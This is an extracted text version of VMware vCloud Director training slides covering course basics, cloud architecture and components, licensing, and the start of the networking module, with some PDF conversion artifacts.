VCloud Director-Install-Configure Manage Allchapters

8/10/2019 VCloud Director-Install-Configure Manage Allchapters

http://slidepdf.com/reader/full/vcloud-director-install-configure-manage-allchapters 1/392

VMware vCloud Director: Install, Configure, Manage 1

C o ur s eI n t r o d u c t i on

1

M O D U L E 1

Course Introduction 1Slide 1-1

Module 1

VMware vCloud Director: Install, Configure, Manage



2 VMware vCloud Director: Install, Configure, Manage

ImportanceSlide 1-2

This course trains you in using VMware® vCloud Director® to deliverinfrastructure as a service in a private enterprise cloud. The course

includes information about public clouds.

You perform hands-on labs to understand how IT resources are

delivered and consumed in a cloud environment.

Your instructor demonstrates the basics of how vCloud Director

abstracts, allocates, and meters IT resources in a cloud environment.






You Are HereSlide 1-4

Course Introduction

VMware vCloud Director Architecture andComponents

VMware vCloud Director Networking

VMware vCloud Director Providers

VMware vCloud Director Organizations

VMware vCloud Director Basic Security

Managing VMware vCloud DirectorResources

Managing VMware vSphere Resources

Monitoring VMware vCloud DirectorComponents

VMware vCloud Director OrganizationUsers

VMware vCloud Director Installation



Module 1 Course Introduction 5


1 Typographical ConventionsSlide 1-5

The following typographical conventions are used in this course:

Monospace Filenames, folder names, path

names, command names:the bin directory

Monospace bold What the user types:

Type ipconfig and press Enter.

Boldface Graphical user interface items:

the Configuration tab

Italic Book titles and emphasis:

vSphere Upgrade Guide

<filename> Placeholders:

<ESXi_host_name>




Classroom Discussion: Cloud ComputingSlide 1-6

Define cloud computing: Cloud computing is an approach to computing that leverages the

efficient pooling of on-demand, self-managed virtual infrastructure that is

consumed as a service.





1 Classroom Discussion: Cloud Computing TypesSlide 1-7

List the three types of cloud deployment: Private

Public

Hybrid

Briefly state what you understand about each of these cloud

deployments: Private: Operated solely within an enterprise for consumption by one or

many internal organizations, typically behind the firewall

Hybrid: Composition of two or more interoperable clouds, enabling dataand application portability

Public: Accessible over the Internet for general consumption




Classroom Discussion: ComponentsSlide 1-8

Which product provides the networking services in vCloud Director? VMware vCloud® Networking and Security servers provide the

networking services to vCloud Director.

To which VMware products does each vCloud Director server group

require access?

Each vCloud Director server group requires access to a VMware®

vCenter Server system, a vCloud Networking and Security server,and one or more VMware® ESX®/VMware® ESXi hosts.





1 Classroom Discussion: Using vCloud Director Slide 1-9

What is an organization composed of? Organizations are composed of users and groups, vApps, catalogs, and

organization VDCs.

What is the role of the organization administrator after the system

administrator sets up the organization?

The organization administrator logs in to the organization and sets it up,

configures resource use, adds users, and selects organization-specificprofiles and settings.




VMware Online ResourcesSlide 1-10

VMware Communities: http://communities.vmware.com Start a discussion, and access communities and user groups.

VMware Support: http://www.vmware.com/support

Access the knowledge base, documentation, technical papers, andcompatibility guides.

VMware Education: http://www.vmware.com/education Access the course catalog and worldwide course schedule.

Access information about advanced courses to continue on yourvirtualization training path.

For easy access to online resources, install the VMware® toolbar.





1 vCloud ResourcesSlide 1-11

www.vmware.com > Products > vCloud Director > Resources



M O D U L E 2




A r c h i t e c t ur e an d C om p on en t s

2

M O D U L E 2

Architecture and Components 2Slide 2-1

Module 2





Course Introduction

















Module 2 Architecture and Components 17

A r c h i t e c t ur e an d C om p on en

t s

2

vCloud Architecture (1)Slide 2-5

VMware vCloud® is a VMware® cloud solution built on VMware technologies and solutions to

deliver cloud computing. Cloud computing is a new approach to computing that leverages the

efficient pooling of on-demand, self-managed virtual infrastructure to provide resources consumableas a service.

A simple cloud architecture might contain a VMware® vCloud Director® server group comprising

multiple servers. Each server can run a collection of services called a vCloud Director cell.

Each vCloud Director server group requires at least one VMware® vCenter Server™ system, a

VMware vCloud® Networking and Security™ server, and one or more VMware® ESX® or

VMware® ESXi™ hosts. For each vCenter Server system managed by vCloud Director, there must be one vCloud Networking and Security server.

All vCloud Director servers in the group share a single vCloud Director database. The group

connects to one or more vCenter Server systems and the ESX or ESXi hosts that they manage. One

vCloud Networking and Security server is needed for each vCenter Server system. vCloud

Networking and Security servers provide network security services and automatically deploy

VMware® vShield Edge™ virtual appliances on demand from vCloud Director.





The VMware vCloud Director Web console allows administrators and operators management

control of vCloud Director. The Web console and communications from the vCloud API system

should connect first to a load balancer. The load balancer routes the communication to one ofseveral vCloud Director cells.

All vCloud Director cells in the cloud share a common vCloud Director database. The vCloud

Director cells should also connect to a common NFS server. The NFS server is used as a temporary

storage facility for images and files that are uploaded into the vCloud Director catalog.

vCenter Server

ESX/ESXiHosts

vCloud

AgentvCloud Agent

vCloud Agent

vCloud Agent

vCloud Agent

vCloud

Agent

Datastores

VMware vSphere®

vCenter database

LDAP

VMware vSphere®Web Client

vCenterChargeback

web interface

vCenterChargebackdatabase

vCenter Chargeback

vCenterChargebackserver

vCloud Director

vCloud Director Cell

vCloud Director Database

vCloud DirectorWeb Console

End Users and Administrators

VMware vCloud® API

vCNS vCloud Networking and security andvCNS Virtual Appliances

DataCollectors

NFS Server


Load Balancer

vCloud Agent

vCloud Connector Virtual Appliance

vCCplug-in

vCloudConnector




A r c h i t e c

t ur e an d C om p on en

t s

2


The vCloud architecture graphic shows the core and the optional components of vCloud.

Other VMware components can be added to increase capabilities or control. One example isVMware® vCenter™ Chargeback™. vCenter Chargeback provides resource metering and reporting

to facilitate resource showback/chargeback. vCenter Chargeback is composed of a vCenter

Chargeback server and vCenter Chargeback data collector.

VMware vCloud® Connector™ is an optional component that helps facilitate the transfer of a

powered-off VMware vSphere® vApp™ in Open Virtualization Format (OVF) format from a local

cloud or vSphere instance to a remote cloud or vSphere instance. vCloud Connector is a virtual

appliance that installs in vSphere and handles all the logic of working with other clouds. The GUI isdisplayed in the VMware vSphere® Web Client through the vCloud Connector browser plug-in.

VMware® vCenter

Server

VMware® ESX®/VMware® ESXiHosts

vCloud

AgentvCloud Agent

vCloud Agent

vCloud Agent

vCloud Agent

vCloud

Agent

Datastores

vSphere

VMware vCenterDatabase

LDAP

VMware vSphere®Web Client

vCenterChargeback

Web Interface

vCenterChargebackDatabase

VMware® vCenter

Chargeback

vCenterChargebackServer

vCloud Director



vCloud DirectorWeb Console

End Users and Administrators

vCloud Networking and Security andvShield Edge Virtual Appliances

DataCollectors

NFS Server


Load Balancer

vCloud Agent

vCloud Connector Virtual Appliance

vCCplug-in

VMwarevCloud®

Connector

(vCC)

vCloud API




Multiple Cell ArchitectureSlide 2-8

Each vCloud Director cell is automatically assigned a role. When communications requests come

into the load balancer requests fall into one of four major categories:

• User Interface (UI). This is the main Web console that administrators and operators use to

manage vCloud Director.

• API. The API consists of commands that can be issued to vCloud Director from other systems

and scripts through the API. Some commands and functions can only be issued though the API.

• Virtual Machine Remote Console (VMRC). This is the pop-out console that an operator can

open on any virtual machine running in vCloud Director.

• Image Transfer. This is the system that allows files and images like .ISO files to be uploaded

into vCloud Director.

A master cell (selected by vCloud Director) coordinates the role assignment to vCloud Director

cells.

Each Cell will have a different role automatically assigned. Multiple cells provide load-balancing.

core (UI/API) console proxy image transfer image transfer

UI API VMRCimage

transfer

firewall

load balancer

cell cell cell cell cell cell cell cell




A r c h i t e c


t s

2

vCloud Components: vSphereSlide 2-9

vCloud infrastructures rely on vSphere resources to provide CPU and memory to run virtual

machines. vCloud Director also uses vSphere distributed switches and vSphere port groups to

support virtual machine networking. vSphere datastores provide storage for virtual machine filesand other files necessary for virtual machine operations. These underlying vSphere resources are

used by vCloud Director to create cloud resources.

vCloud Director requires all workloads to be virtualized. Clusters enabled by VMware vSphere®

Distributed Resource Scheduler™ (DRS) should be set to automatically balance the vCloud Director

deployed workloads across the physical compute resources of the DRS cluster.

NOTE

vCloud Director can be used with a VMware vSphere® Enterprise Edition™ license. To use

vSphere distributed switches, you must have a VMware vSphere® Enterprise Plus Edition™

license.

Use vSphere Web Client for vSphere configuration and preparation.

vCenter Server and vCenter objects:

- Data centers, host clusters, resource pools, vSphere distributed switches,

storage service levels

ESX/ESXi host configuration:

- Virtual switches and networks

- Datastores

vSphere resources, when attached, are managed by vCloud Director.

vCenterServer

ESX/ESXiHosts*

Datastores

vSphere*

vCenterServerDatabase

LDAP

vSphere Web Client

*minimum vSphere 4.0 U2 or 4.1




Supported vCenter Server and ESX/ESXi VersionsSlide 2-10

For information about the supported versions of vCenter Server,ESX/ESXi, and VMware vCloud® Networking and Security, see the

VMware Product Interoperability Matrixes at

http://partnerweb.vmware.com/comp_guide/sim/interop_matrix.php.

vCenter Server 5.x is required for fast provisioning, hardware version

8, and virtual private network support with vCloud Director 5.5.




A r c h i t e c


t s

2

vCloud Components: vCloud DirectorSlide 2-11

A vCloud Director server group consists of one or more vCloud Director servers. These servers

share a common database and are linked to an arbitrary number of vCenter Server systems and ESXi

hosts. vCloud Networking and Security servers provide network services to vCenter Server andvCloud Director. A vCloud Director server group includes multiple vCloud Director servers. Each

server can run a collection of services called a vCloud Director cell. All servers in the group share a

single database. The group connects to multiple vCenter Server systems and the ESXi hosts that

they manage. Each vCenter Server system connects to one vCloud Networking and Security server.

A Web-based portal for vCloud administrators provides the means to allocate and separate resources

into organizations. Administrators can set lease times to control how long vApps can run and be

stored. Administrators can also set quotas, which limit the number of virtual machines that anorganization can have.

A Web-based portal for each organization provides consumers with the means to create and manage

their own virtual machines. Access is controlled through a roles-based model set up by the

organization administrator.

vCloud Director cell:

Runs on Red Hat Enterprise Linux Runs cloud Web server portal for the vCloud Director Web console

- Split between consumers (organization portals) and administrators (system)

Access to vSphere infrastructure can be on a private network segment for securityreasons.

Requirements:

- Runs on a physical or a virtual machine. A virtual machine is preferred.

- Connects to an LDAP server for user management.

- Connects to an SMTP server for notifications.

- Connects to an NFS server for VMware vSphere® vApp file transfer service (multicellenvironments).

- Connects to the vCloud Director database.

vCloud API VMware vCloud Director



vCD Web Console End Users and Administrators

vCloud API

To ESX/ESXi HostLDAPSMTPServer vCenter Server

vCloud Agent

Load Balancer




vCloud Director ScalingSlide 2-12

Scaling vCloud Director to large environments is supported by installing multiple vCloud Director

cells. Cell activities are coordinated through a shared database. One cell is designated as the

coordinator cell. All other cells are designated as subordinate cells. The coordinator cell designateswhich services run on the subordinate cells. These designations are all done automatically by

vCloud Director.

Multiple cells require load balancing to manage heavy use of Web and remote consoles. Options

include configuring round-robin DNS or using a third-party load-balancing product.

A single cell can support many vCenter Server instances. These instances should all be in the same

site to avoid potential latency. You must also scale your vSphere deployment to provide theresources necessary for the multiple vCloud Director cells.

vCloud Director cells are stateless front-end processors for vCloud. All cells connect to a central

database. Each cell has a variety of purposes and self-manages various functions among cells. The

cell manages connectivity to the cloud and provides both API and UI endpoints or clients.

vCloud Director multicell environment: HTTPS load balancer in front of cells

All cells share vCloud Director database.

vCloud Director cells scale horizontally.

NFS server for vSphere vApp file transfer service

Recommendation:

All cells are on a single site.

All infrastructure local to site.

vCloud Directordatabase

loadbalancer

vCloud Director Web console

(points to single URL)

vCloud Director cells

NFSserver




A r c h i t e c


t s

2

Multiple cells (a load-balanced group) should be used to address availability and scale. This

addressing is typically achieved by load balancing or content switching the front-end layer. Load

balancers present a consistent address for services, regardless of the underlying node responding.

Load balances can spread session load across cells, monitor cell health, and add or remove cells

from the active service pool.

If your vCloud Director installation includes multiple cloud cells running behind a load balancer or

a network address translation (NAT) device, or if the cloud cells do not have publicly-routable IP

addresses, you can set a public console proxy address. During the initial configuration of each cloud

cell a remote console proxy IP address is specified. By default, vCloud Director uses that address

when a user attempts to view a virtual machine console. To use a different address, specify a public

console proxy address.

In general, any load balancer that supports SSL session persistence and has network connectivity to

the public-facing Internet or internal service network can perform load balancing of vCloud Director

cells. General concerns around performance, security, manageability, and so on should be taken into

account when deciding to share or dedicate load balancing resources.




vCloud Director Components: vCloud Director Web ConsoleSlide 2-13

The Remote Framebuffer (RFB) protocol is used by the vCloud Director Web console. VMware

encrypts RFB for security. Virtual Network Computing (VNC) is a common implementation of

RFB, but VMware does not use VNC code.

Web browserbased interface for consumers and administrators:

Windows Internet Explorer, Mozilla Firefox, or Google Chrome

Supporting Adobe Flash Player 10.2 or later, 32-bit version

RFB-based consoles for virtual machine guest operating system

console




A r c h i t e c


t s

2

vCloud Components: vCloud APISlide 2-14

The vCloud API is an interface for providing and consuming virtual resources in the cloud. It

enables deploying and managing virtualized workloads in private, public, and hybrid clouds. The

vCloud API enables the upload and download of vApps and their instantiation, deployment, andoperation. In 2009, VMware submitted the vCloud API to the Distributed Management Task Force

to promote consistent mobility, provisioning, management, and service assurance of applications

running in internal and external clouds.

The vCloud API uses a Representational State Transfer (REST) application development style.

vCloud API clients and servers communicate over HTTP, exchanging representations of vCloud

objects. These representations take the form of XML elements. HTTP GET requests are used to

retrieve the current representation of an object. HTTP POST and PUT requests are used to create ormodify an object. HTTP DELETE requests are typically used to delete an object.

Open standard for cloud interaction:

Submitted to DMTF

RESTful API

Implemented in vCloud Director

cloud layer

virtualization layer

physical layer

cloud layer vCloud API

VIM API

Control vSphere resourcesbased on physical resources.

Pure-virtual API to interact atthe cloud layer

client

GETretrieve representation of resource

without side effects

PUT update representation of resource

POSTcreate new resource or execute

action on resource

DELETE destroy resource




vCloud Director Components: vCloud APISlide 2-15

The vCloud API allows for interacting with a cloud and can be used to facilitate communication

with vCloud Director using a UI other than the portal that is included with vCloud Director. The

vCloud API is the cornerstone of federation and ecosystem support in a vCloud environment. All thecurrent federation tools communicate with the vCloud environment through the vCloud API. The

ISV ecosystem also uses the vCloud API to enable its software to communicate with vCloud

environments. Having a vCloud environment expose the vCloud API to the cloud consumer is

important.

Currently, vCloud Director is the only software package that exposes the vCloud API. In some

environments, vCloud Director is deployed behind a portal or in another location not readily

accessible to the cloud consumer. In this case, an API proxy or relay must be present to have thevCloud API exposed to the end consumer.

Because of the value of the vCloud API, some environments might want to meter API usage and

charge extra for it to customers. Protecting the vCloud API through audit trails as well as API

inspection is a good idea. Cloud providers can extend the vCloud API with new features.

User API:

Used to perform tasks in and control what can be done through the vCloudDirector consumer portal.

The vCloud Director implementation of the vCloud API open standard

Administrative API:

Used to perform tasks in and control what can be done through the vCloudDirector administrator portal.

Specific to vCloud Director

Extensions:

vSphere platform operations

POST http://vcloud.example.com/api/v1.0/vApp/vapp-7/action/undeploy

Content-type: application/vnd.vmware.vcloud.undeployVAppParams+xml

...

<UndeployVAppParams saveState="true" xmlns="http://www.vmware.com/vcloud/v1"/>

202 Accepted

Content-Type: application/vnd.vmware.vcloud.task+xml

...

<Task href="http://vcloud.example.com/task/201"...>

vCloud API open standard

h l d i l d d i h l d i i f d i i i d




A r c h i t e c


t s

2

The vCloud API, included with vCloud Director, consists of a user API, an administrative API, and

extensions:

• The user API is the vCloud Director implementation of vCloud API open standard. An

administrator can use this API to perform and control activities done through the vCloud

Director organization Web consoles.

• The administrative API is specific to vCloud Director. An administrator can use this API to

perform and control activities done through the vCloud Director administrator portal.

Extensions enable administrators to perform VMware vSphere® platform operations.

Cl d C t Cl d N t ki d S it




vCloud Components: vCloud Networking and SecuritySlide 2-16

vCloud Director uses vShield Edge appliances to secure multitenancy. vShield Edge also provides

NAT, DHCP, firewall, port forwarding, and IP masquerading services. vCloud Director works with

vCloud Networking and Security to deploy a vShield Edge device as part of the network creation process. These appliances run on vSphere hosts.

Each vCenter Server system is connected to a vCloud Networking and Security host. vCloud

Networking and Security is a Linux-based virtual appliance that deploys and manages vShield Edge

devices as requested by vCloud Director. vCloud Networking and Security also aggregates usage

data for vCenter Chargeback.

vShield Edge appliances are deployed automatically by vCloud Director through vCloud Networking and Security as needed. vShield Edge appliances reside in the vCloud consumer

resource clusters, not in the management cluster. vShield Edge appliances are placed in a system

resource pool by vCloud Director and vCenter Server. For more information about the vShield Edge

appliance and its functions, see vCloud Suite Documentation at https://www.vmware.com/support/

pubs/.

vCloud Networking and Security is responsible for deploying and managing

VMware® vShield Edge devices as requested by vCloud Director: Edge gateway and vApp network devices

Connects to the vCenter Server system through the VMware vSphere® API for vShield

Edge deployment

Manages configurations through

VMware VIX API

Virtual appliance

Runs management interface Aggregates usage data for chargeback

One vCloud Networking and Securityserver per attached vCenterServer system

vShield Edge:

Firewall and router device thatprovides network and security services

Deployed automatically by vCloud Director through vCloud Networking and Security

Deployed to vSphere hosts as a virtual appliance

vCNSsystem

vShieldEdge

vShieldEdge

vCloud Networking and Securitymanager UI

vShieldEdge

vCloud Components: vCenter Chargeback





2

vCloud Components: vCenter ChargebackSlide 2-17

vCenter Chargeback helps to accurately assign, measure, and analyze the cost of workloads in a

vCloud environment. The diagram illustrates how the architectural components of vCenter

Chargeback integrate with other vCloud components.

vCenter Chargeback includes four main components:

• vCenter Chargeback runs on an Apache Tomcat server instance. The user interacts with the

vCenter Chargeback application through a load balancer (Apache HTTP server). vCenter

Chargeback connects to a vCenter Chargeback database that stores application-specific

information.

• vCenter Chargeback retrieves the virtual infrastructure inventory and the resource and networkusage information through data collectors. An embedded data collector communicates with the

vCenter Server database. vCloud infrastructures also use the optional vCloud Director and

vCloud Networking and Security data collectors. vCenter Chargeback replicates collected data

in the vCenter Chargeback database. vCenter Chargeback uses this information and the cost

model and chargeback cost calculation formulas to generate cost reports.

vCenter Chargeback server:

Runs Web portal (Apache Tomcat server) for users and administrativeinterface

Abstracts vCenter Server and vCloud Director objects into the vCenterChargeback hierarchy

Allows resource cost assignment aligned to vCloud Director resourceallocation models

Generates cost and usage reports

Built-in load balancer for scaling vCenterChargeback servers

vCenter Chargeback database

Data collector: Gathers usage data

Populates vCenter Chargeback

database Interface access:

Web interface

VMware vSphere® Client plug-in

vCenterChargebackWeb Interface

vCenterChargebackDatabase

vCenter Chargeback

vCenterChargebackServer

DataCollectorsvCenterServer

vCenterDatabase

LDAP

vSphere Client Plug-In

SMTP Server

vCloudDirectorDatabase

vCloudDirector Cell

vShieldManager

• When you install vCenter Chargeback the vCenter Chargeback application the load balancer




• When you install vCenter Chargeback, the vCenter Chargeback application, the load balancer,

and the data collectors are installed and run on the same machine. Although the vCenter

Chargeback database can also be installed on the same machine, in a real-world scenario you

install the application and the database on separate machines.

• A single data collector instance replicates the information to the vCenter Chargeback database

from multiple vCenter Server instances and vCloud Director databases. You can also create a

cluster of vCenter Chargeback instances that share a single load balancer. Each user request is

routed through the load balancer. The load balancer forwards the request to a vCenter

Chargeback instance in the cluster based on the number of requests currently being serviced by

each instance in the cluster. All the vCenter Chargeback instances in a cluster are connected to

the same vCenter Chargeback database.

The vCenter Chargeback database stores the following chargeback-specific information:

• vCenter Chargeback hierarchy

• vCenter Chargeback users and roles

• Cost models and usage metrics

• Configuration settings

Three types of vCenter Chargeback data collectors are provided:

• vCenter Chargeback data collector (polls vCenter Server)

• vCloud data collector (polls vCloud Director)

• vCloud Networking and Security data collector (polls vCloud Networking and Security)

These data collectors collect vCenter Server inventory and vCloud Director organizational

information, poll usage information, and populate vCenter Chargeback database throughsynchronization jobs. The first instance is installed on the vCenter Chargeback server when you

install vCenter Chargeback.

The vCenter Chargeback Web interface is Web browser-based interface for users and administrators.

The vCenter Chargeback plug-in for the VMware vSphere® Client™ provides limited vCenter

Chargeback administration. Only a subset of the Web interface capabilities are available and the

vCenter Chargeback hierarchy is replicated from the vCenter Server hierarchy.

vCenter Chargeback Scaling





2

vCenter Chargeback ScalingSlide 2-18

vCenter Chargeback virtual machines can be deployed as a two-node, load-balanced cluster.

Multiple vCenter Chargeback data collectors can be deployed remotely to avoid a single point of

failure.

These deployments have no effect on infrastructure availability or customer virtual machines.

Configuring vCenter Chargeback servers in a cluster configuration ensures that providers can

accurately produce customer billing information and usage reports. Configuring vCenter

Chargeback in a cluster configuration is not required for maintaining workload accessibility.

vCenter Chargeback servers:

Configure additional installations of vCenter Chargeback server to connectwith the built-in load balancer that is included in the first instance.

The load balancer spreads load from requests across multiple vCenterChargeback servers.

Data collectors:

Multiple instances can be installed and configured separately.

First instance is installed with vCenter Chargeback server (option selected).

Multiple data collectors can populate a single vCenter Chargebackdatabase.

The load is evenly distributed if multiple data collectors are enabled.

vCenter Chargeback server 1

vCenter Chargebackserver 3

vCenter Chargeback

server 2

vCenter ChargebackWeb interface

load balancer

(built-in)

Optional Advanced Message Queuing Protocol Broker




Optional Advanced Message Queuing Protocol Broker Slide 2-19

vCloud Director includes an AMQP service that you can configure to work with an AMQP broker

such as RabbitMQ.

If you want to use this service, you must install and configure an AMQP broker.

Many integrations require AMQP to communicate with vCloud Director.

Consult the installation and configuration documents for any integrations you plan to use.

Advanced Message Queuing Protocol (AMQP)

An open standard for message queuing

Supports flexible messaging for enterprise systems

RabbitMQ is an AMQP broker.

AMQP is used to provide cloud operators with a stream of notificationsabout events in the cloud.

The use of an AMQP broker with vCloud Director is optional.

vCloud Components: vCloud Connector





2

vCloud Components: vCloud ConnectorSlide 2-20

vCloud Connector is an optional component that can facilitate transfer of a powered-off vApp in

OVF format from a local cloud or vSphere environment to a remote cloud or vSphere environment.

As more clouds are created, several clouds from different sites in a private enterprise can form a

larger cloud. Or a private cloud and a public cloud can form a hybrid cloud. Cloud consumers need a

way to migrate workloads in a federated cloud.

vCloud Connector solves this problem by enabling you to perform migrations from all of your

public clouds and private clouds and to obtain a consistent view of them from a single interface.

vCloud Connector must be installed by cloud administrators, but it can be used by other

administrators and end users to view and manage workloads.

After vCloud Connector has been deployed to a vSphere host and registered with a vCenter Server

system, end users can access vCloud Connector under Solutions and Applications in the vSphere

Web Client from which the OVF file was deployed.

Even in environments not running vCloud Director, vCloud Connector can still be used to copy and

move vApps.

If both vCenter Server instances are added as clouds in vCloud Director, you can freely moveworkloads between them.

vCloud Connector appliance:

The vCloud Connector appliance is a Tomcat server and embeddedPostgres database to bridge vCloud Director and vSphere environments.

vCloud Connector uses temporary storage to facilitate file transfer.

vCloud Connector plug-in for vSphere Client:

Unified view across vSphere and private and public clouds

Visualize workloads and templates

Migrate workloads and templates:

- vSphere to and from vCloud Director

- vSphere to and from vSphere

- vCloud Director to and from vCloud Director

Perform basic power and deployment operationson workloads and templates

Access VMware Remote Consolein vCloud Director

vCloud Connector Architecture




Slide 2-21

vCloud Connector is a virtual appliance. vCloud Connector installs in vSphere and handles all the

business logic of dealing with other clouds. The vCloud Connector UI is displayed in the vSphere

Web Client through a browser plug-in.

You have two considerations about where to place your vCloud Connector appliance:

• The virtual appliance must be deployed to a vCenter Server system. The only user access is

through the vSphere Web Client, so users of vCloud Connector must have the right to log in to

this vCenter Server system.

• Workload copy operations use the vCloud Connector appliance as a middleman, so network

latency and bandwidth between clouds must be considered. In some cases, you might prefer torun multiple instances of vCloud Connector across multiple vCenter Server instances to avoid

network latency or consuming excessive bandwidth.

vCloudConnector Virtual Appliance

attached storage/opt/vmware/vccp/staging(initial configuration =

40GB)

vSphere Clientwith vCloud

Connector plug-in

vCenterServer

vSphere

vCloud Director

private cloud public cloud

local cloud or vSphere

vApp

vCloudDirector

remote cloud

Management and Cloud Resource Clusters





2

Slide 2-22

A management cluster is a VMware vSphere® High Availability or DRS cluster that is created to

manage a vCloud architecture. A management cluster contains the standard components of ESXi

hosts and a vCenter Server system. A management cluster has its own storage. The storage must beshared storage that is used to store the virtual machines running the management cluster.

The management cluster resides on a single physical site.

Although VMware recommends that you place management components in a management cluster,

you can choose how many management components to place in that cluster. For example, the

vCenter Server systems and vCloud Networking and Security instances might be hosted either in the

management cluster or in their respective resource clusters.

vSphere High Availability and DRS can be enabled on the management cluster to provide

availability for all management components. For vSphere High Availability, use the Percentage as

Cluster Resources Reserved admission control policy in an n+1 fashion instead of defining the

amount of host failures a cluster can tolerate or specifying failover hosts. This approach allows

management workloads to run evenly across the hosts in the cluster without the need to dedicate a

host strictly for host failure situations. For higher availability, you can add a host for an n+2 cluster,

although doing so is not a requirement of the vCloud private or public service definitions.

vCloud infrastructure virtual machine:

vCenter Server virtual machines

vCloud Director cell virtual machines

vCenter Chargeback server virtual machines

vCloud Networking and Security virtual appliance

vCenter database virtual machines

vCloud Director database virtual machine

vCenter Chargeback database virtual machine

Optional management functions:

Load balancer virtual machines for vCloud Director cells

vCloud Connector virtual machines

VMware vSphere® Update Manager virtual machines

VMware vSphere® Management Assistant virtualmachine

VMware vSphere® Data Protection virtual machine

vSphere resources are managed by vCloud Director.

Each resource collection represents one or more providerVDCs.

Cloud resources are exclusively for cloud user workloads:No management virtual machines (except vShield Edgevirtual appliances deployed automatically).

Cloud ResourcesManagement Cluster

Provider Virtual Data Center



The resources of vCenter Server clusters host cloud workloads. These resources will be allocated by

Cl d Di t id d t t




vCloud Director as provider datacenters.

The management cluster and vCloud consumer resources must reside on the same physical site. The

use of a single site ensures a consistent level of service. Otherwise, latency issues might arise if

workloads must be moved from one site to another.

Do not use the vSphere Web Client to make changes to resource group objects. Changing the state

of objects created by vCloud Director can cause unpredictable side effects because these objects are

owned and managed by vCloud Director.

vCloud Architecture Best Practice





2

Slide 2-23

From an infrastructure perspective a vCloud Director cloud is built on a foundation of virtual

infrastructure. vCloud Director cloud components are split between a management cluster and cloud

consumer resources.

When building a vCloud Director cloud, assume that all management components, such as vCenter

Server and vCenter Chargeback, will run in virtual machines.

The best practice is to separate resources allocated for management functions from pure user-

requested workloads. The underlying vSphere clusters should also be split into two logical groups:

• A single management cluster running all core components and services needed to run the cloud.

• The remaining available vCenter Server clusters should be aggregated into a pool called cloud

consumer resources. These clusters are under the control of vCloud Director. Multiple clusters

can be managed by the same vCenter Server system or different vCenter Server systems, but

vCloud Director manages the clusters through the vCenter Server systems.

Why should the vSphere resources be organized and separated? Reasons include the following:

• To ensure that management components are separate from the resources that they are managing.

Underlying vSphere clusters should be split into two logical groups:

A single management cluster running all core components and servicesneeded to run the cloud.

Remaining available vCenter Server clusters should be used as cloudresources. The VMware best practice is to use each cluster (resource pool)in a single provider virtual data center.

Each vCloud Director cell should have a corresponding vCenter Server.

Reasons to organize and separate the vSphere resources To ensure that management components are separate from the resources

they are managing.

To minimize overhead for cloud consumer resources. Resources allocatedfor cloud usage have little overhead reserved.

Cloud resource groups should not host vCenter Server virtual machines thatare not created and managed by vCloud Director.

• To minimize overhead for cloud consumer resources. Resources allocated for cloud use have

little overhead reserved




little overhead reserved.

• To dedicate resources to the cloud. Resources can be consistently and transparently managed

and divided. Resources can also be scaled horizontally.

• To more easily accommodate different service levels for distinct workload types.

The underlying vSphere infrastructure should follow vSphere best practices.

Licensing ConsiderationsSlid 2 24




A r c h i t e c t

ur e an d C om p on en t

s

2

Slide 2-24

Without distributed switches, vCloud Director cannot dynamically create networks or effectively use

network pools.

vCloud Director requires the following vSphere licenses:

VMware vSphere® Distributed Resource Scheduler, licensed by VMwarevSphere® Enterprise Edition and VMware vSphere® Enterprise PlusEdition.

VMware vSphere® Distributed Switch and dvFilter, licensed by vSphereEnterprise Plus Edition. This license enables creation and use of vCloudDirector isolated networks and VLAN IDbacked network pools.

vCloud Networking and Security can require a separate license (unlessa VMware vCloud® Suite license is used).

A vCloud Suite license can be used for vCloud Networking and Securityand ESXi hosts.

Review of Learner ObjectivesSlide 2 25




Slide 2-25

You should be able to meet the following objectives:

Describe how VMware® products use the cloud computing approach

Locate vCloud Director components and explain their functions

Determine licensing needs

Key PointsSlide 2 26




A r c h i t e c t

ur e an d C om p on en t s

2

Slide 2-26

Large architectures should be divided into management clusters and

resource groups.

Load balancing is recommended for multicell architectures.

Cells in a multicell architecture have various roles.

Separate management from raw cloud resources.

Questions?




M O D U L E 3

VMware vCloud Director Networking 3




V Mw ar ev C l o u d

Di r e c t or N e t w or k i n g

3

Slide 3-1

Module 3





Course Introduction











ImportanceSlide 3-3



Module 3 VMware vCloud Director Networking 47

V Mw ar ev C l o u d Di r e c t or N e t w or k i n g

3

Deployment and management of VMware® vCloud Director® requires

a comprehensive understanding of vCloud Director networkingconfiguration options. The subject of VMware vCloud® networking

touches many key cloud computing concepts:

Connection of VMware vSphere® vApps to outside users (externalnetworks, organization virtual data center networks, and vAppnetworks)

Multitenancy (separation of organization and vApp network traffic)

Ability of customers to deploy networks dynamically (network pools)

In this module, you learn about the types of vCloud Director networks

and services.



Lesson 1: Types of Networking Used in vCloud Director Slide 3-5





3

Lesson 1:

Types of Networking Used in vCloud

Director

Learner ObjectivesSlide 3-6




By the end of this lesson, you should be able to meet the following

objective:

Describe the types of networking found in vCloud Director

vCloud Director NetworksSlide 3-7





3

Three types of networks are in VMware® vCloud Director®:

• External networks

• Organization virtual data center (VDC) networks

• VMware vSphere® vApp™ networks

The organization VDC networks and vApp networks operate at the customer level. The vApp

networks must be connected to organization VDC networks if you need the following:

• vApps to communicate to other vApps in the organization

• A vApp to communicate with something outside of the cloud (such as the Internet)

Organization networks tie vApps together, so they can communicate outside the cloud by connecting

them to external networks.

vApp networks provide connectivity and services to the virtual machines contained in the vApp, and

can connect those machines to a higher-level organization VDC network.

Both organization VDC networks and vApp networks can be isolated. Isolated networks can provide

services to the connected virtual machines and internal networks, but do not connect to a higher-

level network.

vCloud Director creates three types of networks:

External networks

Organization virtual data center (VDC) networks

vApp networks

Organization VDC networks and vApp networks can be configured inone of three configurations:

Direct-connected to higher network level

Router-connected to a higher network level

Isolated (no connections to higher networks)

vApps that direct-connect to an organization can be deployed by usingnetwork fencing.

Customer Network Requirements and Network StabilitySlide 3-8




Cloud networking addresses a fundamental paradox. Corporate networks can be complex systems.

These networks can be composed of hundreds or even thousands of physical network switches,

routers, bridges, firewalls, and other devices. Each individual physical network device can havehundreds to thousands of programmable components. This large number of complex programmable

components means that networks are extremely complex interconnected systems.

Teams of network engineers work hard to keep these complex interconnected systems stable and

performing well. This means that network engineers are going to resist change. The best network

engineers insist upon using structured change management systems to make sure that all changes are

carefully planned, tested, and coordinated before being implemented.

Network engineers like stable networks that do not change much. Stable systems result in higherquality of service for customers. Stable systems are also which easier to manage and maintain.

In contrast, network customers like dynamic networks. They have constantly changing network

needs and requirements. These needs usually require the rapid deployment of new network systems.

The configuration requirements of these networks are diverse depending on what the customer is

using the network to support.

Corporate networks can be very complex systems.

